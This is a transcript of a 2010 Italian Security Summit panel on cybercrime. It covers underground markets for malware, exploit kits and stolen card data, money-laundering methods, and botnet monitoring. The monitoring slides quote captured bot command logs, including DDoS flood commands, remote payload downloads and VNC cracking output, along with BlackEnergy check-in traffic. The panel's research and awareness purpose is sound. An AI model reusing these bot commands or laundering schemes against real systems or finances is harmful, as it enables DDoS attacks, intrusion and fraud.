CyberCrime e dintorni ;) Security Summit Roma 10 Giugno 2010

Transcript

1 CyberCrime e dintorni ;) Security Summit Roma 10 Giugno

2 Relatori 2 Introduce e modera Paolo Colombo Senior Security Consultant Accenture Intervengono Raoul Chiesa ENISA PSG, CLUSIT Claudio Guarnieri Ricercatore indipendente Shadowserver Foundation Marco Pacchiardo Principal Consultant British Telecom

3 Agenda 3 Definizione di CyberCrime CyberCrime Underground Economy Cyberlaundering Botnet Conclusioni

4 Cybercrime 4 Definizione di CyberCrime Raoul Chiesa

5 Disclaimer

6 Raoul s Disclaimer 6 Le informazioni contenute in questa presentazione non infrangono alcuna proprietà intellettuale, nè contengono strumenti o istruzioni che potrebbero essere in conflitto con la vigente legislazione. I dati statistici ed i profili appartengono all Hackers Profiling Project (HPP), sotto il patrocinio dell UNICRI e dell ISECOM. I marchi registrati appartengono ai rispettivi proprietari. Le opinioni qui espresse sono quelle dell autore e non rispecchiano necessariamente quelle dell UNICRI, di altre agenzie delle Nazioni Unite, dell ENISA o del CLUSIT.

7 Raoul nobody Chiesa 7 Comitato Direttivo e Comitato Tecnico- Scientifico del CLUSIT ( ), socio Fondatore Membro del Permanent Stakeholders Group (PSG) dell ENISA European Network & Information Security Agency Senior Advisor, Strategic Alliances & Cybercrime Issues, UNICRI United Nations Interregional Crime & Justice Research Institute Mediaservice.net Board of Directors, ISECOM Institute for Security and Open Methodologies Board of Directors, OWASP Italian Chapter Associated Partner, TSTF Telecom Security Task Force ICANN (ALS)

8

9 Cos è il Cybercrime? 9 Wikipedia Italia non lo sa Wikipedia intl. risponde: Computer Crime

10

11 Cos è il Cybercrime? (2nd try!) 11 Computer crime - From Wikipedia, the free encyclopedia (Redirected from Cybercrime: Computer crime refers to any crime that involves a computer and a network, where the computers may or may not have played an instrumental part in the commission of the crime (Moore 2000). Netcrime refers, more precisely, to criminal exploitation of the Internet [1]. Issues surrounding this type of crime have become high-profile, particularly those surrounding hacking, copyright infringement, child porn, and child grooming. There are also problems of privacy when confidential information is lost or intercepted, lawfully or otherwise. On the global level, both governments and non-state actors continue to grow in importance, with the ability to engage in such activities as espionage, financial theft, and other cross-border crimes sometimes referred to as cyber warfare. The international legal system is attempting to hold actors accountable for their actions, with the International Criminal Court among the few addressing this threat. [2]

12 Cos è il Cybercrime? (2nd try!) 12 A prima vista, sembra che stiamo parlando di attori differenti, con scopi, obiettivi (target) e modelli criminosi differenti.

13 Hackers Profiling Project (UNICRI, ISECOM, CLUSIT) 13 PROFILE OFFENDER ID LONE / GROUP HACKER TARGET MOTIVATIONS / PURPOSES Wanna Be Lamer 9-16 years I would like to be a hacker, but I can t GROUP End-User For fashion, It s cool => to boast and brag Script Kiddie years The script boy GROUP: but they act alone SME / Specific security flaws To give vent of their anger / attract mass-media attention Cracker years The destructor, burned ground LONE Business company To demonstrate their power / attract mass-media attention Ethical Hacker years The ethical hacker s world LONE / GROUP (only for fun) Vendor / Technology For curiosity (to learn) and altruistic purposes Quiet, Paranoid, Skilled Hacker years The very specialized and paranoid attacker LONE On necessity For curiosity (to learn) => egoistic purposes Cyber-Warrior years The soldier, hacking for money LONE Symbol business company / End-User For profit Industrial Spy years Industrial espionage LONE Business company / Corporation For profit Government Agent years CIA, Mossad, FBI, etc. LONE / GROUP Government / Suspected Terrorist/ Strategic company/ Individual Espionage/ Counter-espionage Vulnerability test Activity-monitoring Military Hacker years LONE / GROUP Government / Strategic company Monitoring / controlling / crashing systems

14 Industrial Espionage: cos è? 14 (da wikipedia) Industrial espionage or corporate espionage is espionage conducted for commercial purposes instead of national security purposes. Espionage takes place in many forms. In short, the purpose of espionage is to gather knowledge about (an) organization(s). A spy may be hired, or may work for oneself.

15 Zooming 15 The term is distinct from legal and ethical activities such as examining corporate publications, websites, patent filings, and the like to determine the activities of a corporation (this is normally referred to as competitive intelligence). Theoretically the difference between espionage and legal information gathering is clear. In practice, it is sometimes quite difficult to tell the difference between legal and illegal methods. Especially if one starts to consider the ethical side of information gathering, the border becomes even more blurred and elusive of definition. Industrial espionage describes activities such as theft of trade secrets, bribery, blackmail, and technological surveillance. As well as spying on commercial organizations, governments can also be targets of commercial espionage for example, to determine the terms of a tender for a government contract so that another tenderer can underbid. Industrial espionage is most commonly associated with technology-heavy industries, particularly the computer and automobile sectors.

16 Una riflessione 16 Information can make the difference between success and failure; if a trade secret is stolen, the competitive playing field is levelled or even tipped in favor of a competitor. (ne parleremo dopo)

17 Cos è l Intelligence? (agenzie) 17 From wikipedia: (http://en.wikipedia.org/wiki/intelligence agency) An intelligence agency is a governmental agency that is devoted to the information gathering (known in the context as "intelligence") for purposes of national security and defense. Means of information gathering may include espionage, communication interception, cryptanalysis, cooperation with other institutions, and evaluation of public sources. The assembly and propagation of this information is known as intelligence analysis. Intelligence agencies can provide the following services for their national governments: provide analysis in areas relevant to national security; give early warning of impending crises; serve national and international crisis management by helping to discern the intentions of current or potential opponents; inform national defense planning and military operations; protect secrets, both of their own sources and activities, and those of other state agencies; and may act covertly to influence the outcome of events in favor of national interests. Intelligence agencies are also involved in defensive activities such as counter-espionage or counter-terrorism. Some agencies are accused of being involved in assassination, arms sales, coups d'état, and the placement of misinformation (propaganda) as well as other covert operations, in order to support their own or their governments' interests.

18 Cos è l Info Warfare? 18 From wikipedia: (http://en.wikipedia.org/wiki/information_warfare)

19 Cos è l Information Warfare? (cont.) 19 From wikipedia: (http://en.wikipedia.org/wiki/information_warfare ) Information warfare is the use and management of information in pursuit of a competitive advantage Over an opponent. Information warfare may involve Collection of tactical information, assurance(s) that one's own information is valid, spreading of propaganda or disinformation to demoralize the enemy and the public, undermining the quality of opposing force information and denial of information-collection opportunities to opposing forces. Information warfare is closely linked to psychological warfare.

20 Attention, please! Se cerchiamo Cyber Warfare, Wikipedia sa di che cosa stiamo parlando! (anche se, lo inserisce sotto computer crimes.strana la vita eh ) The U.S. Department of Defense (DoD) notes that cyberspace has emerged as a national-level concern through several recent events of geo-strategic significance. Among those are included the attack on Estonia's infrastructure in 2007, allegedly by Russian hackers. "In August 2008, Russia again allegedly conducted cyber attacks, this time in a coordinated and synchronized kinetic and non-kinetic campaign against the country of Georgia. Fearing that such attacks may become the norm in future warfare among nation-states, the concept of cyberspace operations impacts and will be adapted by warfighting military commanders in the future.

21 Ma di che Paesi stiamo parlando? USA ( everywhere, always!) UK, Canada, Francia, Russia, Switzerland Brazil Israel & Palestinian National Authority Zimbabwe Middle East: Paesi amici (UAE, Saudi Arabia ) China India Pakistan North Korea (DPRK) South Korea Iran Tatarstan Kyrgyzstan Ingushetia (ex URSS) Myanmar Russia (Estonia, Georgia) Low Risk Average Risk High Risk

22 Ma cosa possono fare, esattamente? 22

23 Ma cosa possono fare, esattamente? /2 23

24 Esempi 24 Non penso sia necessario riepilogare, zoomare, commentare gli incidenti già avvenuti. E sufficiente elencarli.per lasciare la parola ai prossimi interventi.e ritornarci poi sopra tutti insieme, durante il dibattito: Estonia Cyber-war (2007) Russia-Georgia Cyber-war (2008) North-Korea Attacks (2009) Google-Cina Operation Aurora (2010)

25

26

27

28 Punti di contatto tra questi mondi? YES! 28 PC Zombie (botnet) -> approfittano dell utonto medio, sia in contesto corporate (company s policy permettendo.ma l utente riesce sempre, somehow, ad aggirarle!) che casalingo (broadband). 0-days : ad oggi, tutti su sistemi MS Windows 0-days : ad oggi, nessuna vulnerabilità non nota exploitata, ma bugs su IE6.0 (!) & co (per l attacker) cambia poco/oramai quasi nulla, ownare i 100/1000 PC dell azienda X, o 100 broadband di utenti finali

29 29

30 30 Videoclip (3 minuti, Olanda)

31 Per concludere (e riflettere) 31

32 Cybercrime 32 Cybercrime Underground Economy Claudio Guarnieri

33 Keywords 33 Cybercrime Black Market Malware Botnets Malicious Software Reti (networks) di computer infetti controllati, tramite dei malware robot automatizzati, da un entità criminale. Derivate dei Remote Administration Tool, ma con target di massa.

34 Black Market 34 Administrator Administrator Guarantors Moderator Moderator Moderator Moderator Trial Seller Trial Seller Verified Seller Verified Seller Verified Seller Verified Seller Verified Seller Verified Seller User User User User User User User User User User User User User User User User

35 Il Black Market visto da Customer 35 Crearsi una struttura per inserirsi nel cybercrime e nel suo relativo mercato non è difficile e si può essere operativi con un investimento minimo e nessuna particolare competenza tecnica. Toolkit per Infezione di massa Acquisto Malware Acquisto Traffico Encrypting Malware Acquisto Servizio di Hosting

36 Guarantors 36 In Verifica. Questi Forum sono amministrati dai Guarantors, che si fanno garanti di ogni vendita. I Guarantors verificano ogni offerta di vendita certificando prodotto e venditore ed approvando così la commercializzazione sul proprio portale. Per questo servizio molto spesso richiedono ai verified seller o una tassa di iscrizione o una percentuale su ogni vendita.

37 Malware Developers 37 In questo Forum Post il venditore offre un malware di nome SpyEye con features di Keylogging e Grabbing di credenziali HTTP e FTP. 500$

38 Packers Developers 38 In quest altro post il venditore offre un servizio di Packing di malware, che permetterebbe il bypass di tutti i Firewall e Antivirus ed il bypass dell User Access Control di Windows Vista e Windows 7. Supporto 24/7. 488$ o 200$ al mese

39 Exploit Kits Developers 39 In questo post viene venduto un Exploit Kit completo di exploits per Internet Explorer, Adobe Reader, Flash, Microsoft DirectShow ed Excel. 800$

40 Bulletproof Hosting 40 In questo post vengono offerti servizi di Hosting di vario tipo (Shared, VPS, Dedicated etc.). Piani tariffari e tecnici personalizzati, anonimato, sistema anti-black che permette il bypass di sistemi di spam filtering e malware listing. Tariffario non pubblico :-(

41 Bulletproof Hosting (2) 41

42 Traffic Sellers 42 Traffico da siti/utenti compromessi in US, GB, AU, CA e DE 1000 visite a 7$ acquisto minimo 5000 visite In questo caso è messo in vendita del Traffic, ossia quantità di richieste HTTP di utenti ignari su siti legittimi, ma compromessi, che vengono redirette a domini malevoli (di proprietà dell acquirente) generalmente ospitanti degli Exploit Kits. Molto spesso viene generato traffico in vendita anche tramite MSN spam.

43 Da Customer a Seller 43 Diretto Botnet Master Indiretto Vendita Botnet Programmi di Affiliazione DDoS Rental Vendita Identità Spam Campaigns Click Fraud Campaigns Fake AV Campaigns Vendita CC

44 DDoS Rental 44 Stanchi dei vostri concorrenti? Stanchi del nemico? Questo venditore offre servizi di Distributed Denial of Service su richiesta. Disponibilità e supporto 24/7, test gratuito di 5-10 minuti. 60$/giorno 120$/giorno se protezione anti-ddos

45 Carding 45 US visa/us master $2.5 Random ITALY cc $17 BOA, CITI, CHASE.COM LOGIN +PASS FULLS COMPLETE BALANCE: $25000 verified PRICE: $525

46 Carding (2) 46 Per certificare la propria credibilità vengono spesso inseriti dai dati di Carte di Credito Demo, ossia disponibili all eventuale acquirente per verificare che il venditore sia in buona fede. Questo caso è completo di qualsiasi informazione relativa al possessore della carta.

47 Carding (3) 47 Un account PayPal con saldo di 1000$ 50$ Un account Bank of America con saldo da 75000$ a $ 300$ Pagamenti tramite LibertyReserve.com e WesternUnion

48 Carding (4) 48 I Carders non fanno certo segreto del proprio mercato :-)

49 Spam Campaigns 49 Uno dei metodi più proficui per un gestore di Botnet è lo Spam. In questo post una organizzazione di nome EvaPharmacy offre affiliazione per Botnets. In cambio di una campagna di Spam offrono il 45% per ogni acquisto da 60$ a 100$ proveniente dalla propria campagna. L 85% dello Spam totale è stimato provenire da Botnets.

50 Click Fraud Campaigns 50 In base alle statistiche di ClickForensics il Cybercrime nel 2008 ha ricavato 33 milioni di dollari da campagne di Click Fraud.

51 Fake AntiVirus Campaigns 51

52 Fake AntiVirus Campaigns (2) 52 Recentemente è stato incriminato un gruppo di criminali autori di una campagna di Fake AV Fraud che secondo gli inquirenti ha fruttato circa 100 milioni di dollari.

53 53 Cyberlaundering Marco Pacchiardo CYBERCRIME

54 Cos è? 54 E il riciclaggio di denaro in modo elettronico Utilizzato per ripulire denaro proveniente da attività illecite o utilizzato per finanziare attività illecite Si basa principalmente su 3 concetti: Placement Layering Integration

55 Placement Layering Integration 55

56 Placement Integration Layering 56 Banca 1 Banca 2 Banca 3 Banca 4 Banca 5 Banca 6 Banca 7 Banca 8 Banca off shore Beni immobili Azienda off shore Azienda Ghost Beni di lusso

57 Vantaggi 57 Placement Layering Integration Peso / Volume Disintermediazione Frazionamento Bassa Rintracciabilità Movimentazione elettronica Alta Velocità Basso Controllo Assenza di contatto Nessun registro / log

58 Esempi 58 Placement Layering Integration E-Gold IVTS SHELL / GHOST / FRONT COMPANIES PC / PALMARE ATM DENARO ELETTRONICO O IMPALPABILE PARADISI FISCALI BENI IMMOBILI E DI LUSSO INTERNET GAMBLING SOCIAL NETWORK smaterializzazione materializzazione

59 Esempi di Placement 59 Hawala Fen C hui Droga al dettaglio Acquisto ebay card Second Life Carte pre pagate Viaggi di piacere

60 Esempi di Layering 60 Suddivisione denaro su n conti Acquisto beni su ebay IVTS -> Hawala / Fen C hui Suddivisione su n aziende

61 Esempi di Integration 61 Acquisto appartamenti e beni immobili Conto su banca off-shore Acquisto titoli di stato Riconciliazione carte e IVTS E-Gold

62 Placement 62 Utilizzo identità false (persone, aziende) Smurfing (telefono, sistemi on-line, carte prepagate..) Trasferimenti di denaro verso banche offshore (utilizzo di internet, criptazione, draft ...) IVTS Loan-back (prestito su compagnie offshore)

63 Placement (2) 63 e-gold, Goldmoney, e-bullion, AnonymousGold Utilizzo di ATM con card per e-gold Mpay Paysafecard (ma non è possibile Layering e Integration perchè non permette pagamenti person-to-person) Modex, Proton, VisaCash

64 Esempi 64 Placement Layering Integration

65 Esempi (2) 65 Placement Layering Integration Banca Israeliana Banca di origine Banca a Panama

66 Esempi 66 Placement Layering Integration

67 Internet Service Provider 67 The persons on investigation were directors of a company involved in purchasing large quantities of duty free cigarettes and alcohol to sell on the domestic market contrary to their export-duty free status, thus avoiding tax obligations. In one file, the bank account in Belgium of an individual was credited by wire transfers from an Internet payment service provider (small amounts for a total of EUR 4 700). The subject was under investigation in another European country for the sale of drug starters. Information from law enforcement confirmed that the subject was selling drug starters via a commercial website. On 27 April 2007, a federal grand jury in Washington, D.C., indicted two companies operating a digital currency business and their owners. The indictment charges E-Gold Ltd., Gold and Silver Reserve, Inc., and their owners with one count each of conspiracy to launder monetary instruments, [...]. According to the indictment, persons seeking to use the alternative payment system E-Gold were only required to provide a valid address to open an E-Gold account no other contact information was verified. The majority of the wire transfers are of small amounts (maximum EUR 800), originate from various senders and, following the message accompanying the payment, should be related to sales on a commercial website, sometimes the sales of luxury goods. Payments are not made through an Internet payment service provider but originate from the bank account of the buyer and are credited on the bank account of the seller. The wire transfers are followed by instant withdrawals in cash. The goods are never delivered to the buyer (victim of a non-delivery fraud).

68 Calcio? 68 The FIU of country B received a disclosure from a bank with regard to suspicious transactions concerning club A. This club, which was in financial difficulties, was looking for funds (several million EUR) in order to avoid bankruptcy. A financing proposal was put forward by a financial group established in South America. It was linked to an individual that had already invested funds in various foreign clubs. These funds were suspected to be of illegal origin. After the bank inquired into the origin of the funds the financial group withdrew from the negotiations. A second financing proposal was then put forward by Mr. COX, a European investor through his company located in a tax haven. Suspicions were aroused because this individual, unfamiliar to the world of sports, had suddenly suggested investing money of unknown origin in club A. Additional information showed that Mr. COX was known to the police and FIU for various cases of fraud. In this case the different possibilities for investing in club A can be considered to be attempts to launder money of illegal origin. Italy has experienced an attempt to launder money through the purchase of a famous Italian football team. The investigations16 to detect the case started from judicial proceedings in The Procura della Repubblica suspected that financial crimes were occurring, such as, money laundering, insider trading and misuse of market information.. [ ] Investigations uncovered evidence that the money used to buy the shares was supplied by a criminal association operating in Central Italy. Further, a part of that money, supposedly offered to the football team as sponsorship, was then diverted to another company to purchase real estate, which was subsequently seized by Italian judicial authorities. Investigators identified that the criminal association was strongly interested in purchasing the football team with funds obtained from several offences.

69 Giochi? 69 Casinò on line per riciclare proventi di droga SecondLife: pagamento droga con soldi virtuali SecondLife: Multi-avatar per pagare merce virtuale a se stessi Vendita di soldi virtuali ad altri giocatori

70 Banche e Finanza 70 Clearing House Interbank Payments System (CHIPS)

71 LEGISLAZIONE INTERNAZIONALE 71 Trasferimento di denaro Direttiva 2001/97/EC, Articolo 3 -> log oltre US Patriot Act Section 326 -> $ /60/CE prevenzione dell'uso del sistema finanziario a scopo di riciclaggio dei proventi di attività criminose e di finanziamento del terrorismo Direttive FATF 40 Direttive + 19 raccomandazioni

72 Legislazione 72 United Nations (UNODC) Vienna Convention: Convention Against Illicit Traffic in Narcotic Drugs and Psychotropic Substances, 19 December, 1988 International Convention for the Suppression of the Financing of Terrorism, 9 December, 1999 Palermo Convention: Convention Against Transnational Organized Crime, 15 November, 2001 UN Security Council Resolutions European Union (EU) Strasbourg Convention: Convention on Laundering, Search, Seizure and Confiscation of the Proceeds from Crime, 8 November, 1990 Council common position on combating terrorism (2001/930/CFSP), 27 December, 2001 Council common position on the application of specific measures to combat terrorism (2001/931/CFSP), 27 December, 2001 Warsaw Convention: Council of Europe Convention on Laundering, Search, Seizure and Confiscation of the Proceeds from Crime and on the Financing of Terrorism, 16 May, 2005 Directive 2005/60/EC, 26 October, 2005 Financial Action Task Force (FATF) 40 Recommendations, June, Special Recommendations, 22 October, 2004 Egmont Group of Financial Intelligence Units Statement of Purpose, 23 June, 2004

73 FATF membri, di cui 33 giurisdizioni 2 organizzazioni regionali (Gulf Cooperation Cuncil & European Commission)

74 FATF Working Groups 74

75 Esistono delle contromisure? 75 Esistono dei software che per loro natura sono localizzati Esiste una legislazione frammentata e degli enti intrenazionali Parere personale: Lavoro di intelligence a livello internazionale Network informale: persone, non enti Intensificazione della Digital Forensics Conoscenza delle tecniche di CyberCrime e delle tecnologie utilizzate

76 Cybercrime 76 Botnet Claudio Guarnieri

77 Rete di computers infetti (zombies) controllati da specifici malware chiamati: Bot Una o più reti di questo tipo sono controllate da un entità criminale comunemente chiamata: Botmaster Botnet Ogni Botnet è gestita e comandata dal proprio Botmaster tramite un: Command & Control (C&C) Il Botmaster sfrutta i dati, la capacità computazionale e la rete di ogni zombie per specifiche Campagne Criminali 77

78 Utilizzi delle Botnets 78 DDoS Keylogging Scareware, Adware Installing Spamming Sniffing Rubare altre Botnets? Mass Identify Theft

79 Formazione e Propagazione Una Botnet per formarsi e crescere deve raccogliere zombies i quali passano attraverso tre fasi: 79 Exploiting Infecting Assimilating Più una Botnet dispone di zombies più potenza di fuoco avrà. Per questo motivo molto spesso i bot vengono forniti di funzioni per spreading su Internet.

80 Gestione e Controllo Ogni Botnet è controllata e gestita tramite un Command & Control (C&C), che è un interfaccia tra gli zombies e il Botmaster. 80 In figura uno schema che rappresenta una struttura di Command & Control centralizzato. Nonostante esistano molti esempi di Botnet Peer 2 Peer (Storm, Waledac etc.) ci concentreremo su questa struttura essendo la più comune. In particolar modo vedremo Botnet basate su Internet Relay Chat (IRC).

81 Qualche Numero Questo grafico mostra il numero approssimativo di Botnets monitorate attivamente dall infrastruttura di Shadowserver Foundation negli ultimi 6 mesi: Ogni Botnet ha un ciclo di vita di una durata generalmente determinata a seconda del proprio scopo.

82 C&C Geolocation Questa mappa rappresenta la distribuzione geografica dei C&C attualmente conosciuti a Shadowserver.

83 Zombies Geolocationing In questa mappa sono rappresentati gli Zombies rilevati da Shadowserver nell arco di 24 ore. E una stima approssimativa e in parte fin troppo ottimistica.

84 Shadowserver Tracking Process 84 80

85 Infiltrazione fai-da-te Snoopyd è un framework per Botnet Infiltration. E fornito di un demone XMLRPC che rimane in ascolto per richieste di infiltrazione. Per ora supporta solo IRC, ma è in sviluppo il supporto per Botnet HTTP. Ogni drone monitora l attività della Botnet e invia ogni informazione ad un DataBase. Per ogni richiesta ricevuta, Snoopyd effettua il deployment di un drone che replica la connessione di un vero zombie Bot.

86 Snoopyd Snoopyd è fornito di una semplice Web Interface che permette di visualizzare i risultati del monitoring.

87 Snoopyd (2) Per ogni Botnet monitorata vengono presentate delle informazioni riassuntive: hostname, IP, reverse DNS, geolocation e parametri di connessione.

88 Snoopyd (3) Il traffico della Botnet monitorata viene salvato interamente in una base di dati.

89 IRC Internet Relay Chat è un protocollo di comunicazione TCP/TLS. E basato su dei channel, ossia delle chatroom in cui gli utenti possono incontrarsi e comunicare. IRC è comunemente usato nel cybercrime sia come strumento di comunicazione e piazza di vendita sia come base operativa per la gran parte di Botnets. In questi casi il server e canale IRC rappresentano il C&C della Botnet dove tutti gli zombie si collegano in attesa di ricevere istruzioni dal Botmaster.

90 Assimilazione nella Botnet Connessione al C&C e ingresso nel canale: -> NICK ITA 00 XP SP2 L > USER pajgsqbz 0 0 :ITA 00 XP SP2 L <- Welcome to the [CENSORED] IRC Network ITA 00 XP SP2 L ! <- AUTH :*** Found your hostname (cached) <- AUTH :*** Looking up your hostname... -> JOIN ##sodoma_3 s0dom4j03 <- ##sodoma_3 :.root.start dcom a -r s <- ##sodoma_3 drake <- ##sodoma_3 :ITA 00 XP SP2 <- ##sodoma_3 :End of /NAMES list. Una volta entrato il bot per prima cosa legge il titolo del canale ed eseguo il comando in esso contenuto.

91 Gestione della Botnet Il Botmaster entra in canale: NeO_Anderson joined #a <Guard-v1_5> Welcome to #a sir, may I take your coat? ;-) Il Botmaster effettua l autenticazione e comanda un download: <ddos>.login s3x <ddos>.download C:install.exe 1

92 Sodoma Botnet Come nostro primo esempio vediamo una Botnet, gestita da Italiani, di basso profilo ma istruttiva.

93 Sodoma Botnet (2) <KrOwN>.irc.activate c0d1am0z3 -s<krown>.root.stop -s <drake>.ddos.icmp 77.xxx.xxx.xxx 450 -s <KrOwN>.ddos.supersyn 109.xxx.xxx.xxx s <KrOwN>.ddos.hack 94.xxx.xxx.xxx s.ddos.ack? :-P Gli attacchi DDoS seguenti hanno come bersaglio altri C&C: <KrOwN>.ddos.supersyn 82.xxx.xxx.xxx s <KrOwN>.ddos.supersyn 79.xxx.xxx.xxx s <KrOwN>.ddos.supersyn 213.xxx.xxx.xxx s La maggior parte di queste Botnet nemiche sono italiane.

94 Sodoma Botnet (3) CENSORED

95 F*****g Botnet In questo caso la Botnet è di dimensioni notevoli (Circa Zombies), pericolosa e molto attiva.

96 F*****g Botnet (2) * ddos sets +v to [M]ARG <ddos>.login s3x <[M]ARG 04428> -main- Password accepted. <ddos>.icmp 69.xxx.xxx.xxx 200 <[M]ARG 04428> -icmp- Flooding: (69.xxx.xxx.xxx) for 200 seconds. <[M]ARG 04428> -icmp- done with flood to 69.xxx.xxx.xxx. sent KB/sec (1MB). <ddos>.skysyn 69.xxx.xxx.xxx <[M]ARG 04428> -skysyn- Flooding: (69.xxx.xxx.xxx:53) for 100 seconds. <ddos>.download C:install.exe 1 <[M]ARG 27537> -download- Downloading URL: to: C:install.exe. <[M]ARG 27537> -download- downloaded KB to 18.8 KB/sec <[M]ARG 27537> -download- opened C:install.exe

97 F*****g Botnet (3) L organizzazione dietro alla gestione di questa Botnet risulta essere di origine Serba. Il loro target nell arco di 15 giorni di monitoring è sempre stato un Network sospetto (molto simile a RBN) di origine Pakistana. Anti-DDoS Infrastructures Datacenters Hosting Network Pakistana sospetta

98 F*****g Botnet (4) CENSORED

99 VNC Botnet Questa è sicuramente la Botnet più pericolosa che analizzeremo oggi. Come il nome suggerisca si occupa di violare accessi VNC.

100 VNC Botnet (2) Questa Botnet in un periodo di 10 giorni di monitoring aveva all attivo circa zombies ad occuparsi di cercare e violare macchine con VNC vulnerabili, le cui credenziali vengono passate in chiaro nel canale. <[nlh-vnc]njrold> [RAGE SCAN:] range: 71.x.x.x/94 threads. <[nlh-vnc]ozburt> [RAGE SCAN:] range: 87.x.x.x/94 threads. <[nlh-vnc]cdnvon> VNC3.6 CRACKED ([CENSORED]) 76.xxx.xxx.xxx 1234 <[nlh-vnc]unsuii> VNC3.8 CRACKED ([CENSORED]) 213.xxx.xxx.xxx authbypass <[nlh-vnc]llpdpl> VNC3.6 CRACKED ([CENSORED]) 64.xxx.xxx.xxx <[nlh-vnc]zyzavm> VNC3.8 CRACKED ([CENSORED]) 84.xxx.xxx.xxx <[nlh-vnc]vaxtjr> VNC3.3 CRACKED ([CENSORED]) 91.xxx.xxx.xxx 1234 <[nlh-vnc]sxlrmy> VNC3.6 CRACKED ([CENSORED]) 83.xxx.xxx.xxx 1234 <[nlh-vnc]ppmoyi> VNC3.6 CRACKED ([CENSORED]) 201.xxx.xxx.xxx admin <[nlh-vnc]qsggos> VNC3.7 CRACKED ([CENSORED]): 201.xxx.xxx.xxx - [NoPass]

101 VNC Botnet (3) Nell arco di 10 giorni sono state compromesse un totale di circa macchine complete di IP e Password

102 VNC Botnet (4) Decine di macchine appartenenti a reti universitarie di ogni parte del globo. La maggior parte appartenenti a dipartimenti di Information Technology (:-P) Molte appartenenti a reti inter-universitarie e Research Networks Macchine appartenenti a laboratori di ricerca governativi Macchine appartenenti ad Investment Groups di primo piano Appartenenti a famosi siti di e-commerce Molte compagnie telefoniche Appartenenti a Ministeri (anche di Informatica e delle Comunicazioni) Sì, ce ne sono anche di Italiane :-(

103 VNC Botnet (5) <sh3llx> you bastard <sh3llx> like to spy? *** You are permanently banned from M0dded MrAnToN (pwned By sh3llx!) ERROR :Closing Link: [nlh-vnc]wpjscd (User has been permanently banned from M0dded MrAnToN (pwned By sh3llx!)) I droni per monitoring essendo una replica solo marginale del comportamento di un Bot reale prima o poi vengono identificati e banditi dal C&C. Molto spesso dopo che vengono scoperti degli infiltrati, l intera Botnet viene clonata e spostata in un altra sede.

104 Botnets HTTP Nonostante le Botnet IRC siano ancora molto diffuse e le più educative da monitorare, negli ultimi 2-3 anni osserviamo un importante aumento di C&C HTTPbased. Zombie HTTP C&C Assimilazione

105 ZeuS Builder

106 ZeuS Control Il Control Panel di ZeuS offre un interfaccia Web molto user-friendly.

107 ZeuS Control (2) Per ogni autenticazione HTTP intercettata viene creato un comodo report con tutte le credenziali a disposizione.

108 Blackenergy

109 Blackenergy (2) Il Bot una volta installato contatta un server HTTP su cui effettua una richiesta POST che serve sia per registrare lo Zombie nel C&C sia per ottenere istruzioni da eseguire. POST /dot/stat.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;.NET CLR ) Host: [CENSORED].cn Content-Length: 31 Cache-Control: no-cache id=xxx_xxxxxxx&build_id=d5729

110 Blackenergy (3) La risposta del server sono delle istruzioni da eseguire encodate in Base 64: HTTP/ OK Date: Tue, 25 Sep :30:13 GMT Server: Apache/ (Unix) FrontPage/ PHP/5.2.3mod_ssl/ OpenSSL/0.9.7e-p1X-Powered-By: PHP/5.2.3 Content-Length: 80 Connection: close Content-Type: text/html MTA7MjAwMDsxMDswOzA7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI3[ CENSORED]==

111 Blackenergy (4) ;2000;10;0;0;30;100;3;20;1000;2000#wait#10#xXXX_XXXXXX 10;3000;10;1;0;30;10;25;15;2000;3000#flood http [CENSORED].org.ua#5#xXXX_XXXXXX 10;2000;10;1;0;30;50;50;20;1000;2000#flood syn 80,81,82,83,443,25,22,21,110#10#xXXX_XXXXXX

112 Blackenergy (5)

113 TweBot Builder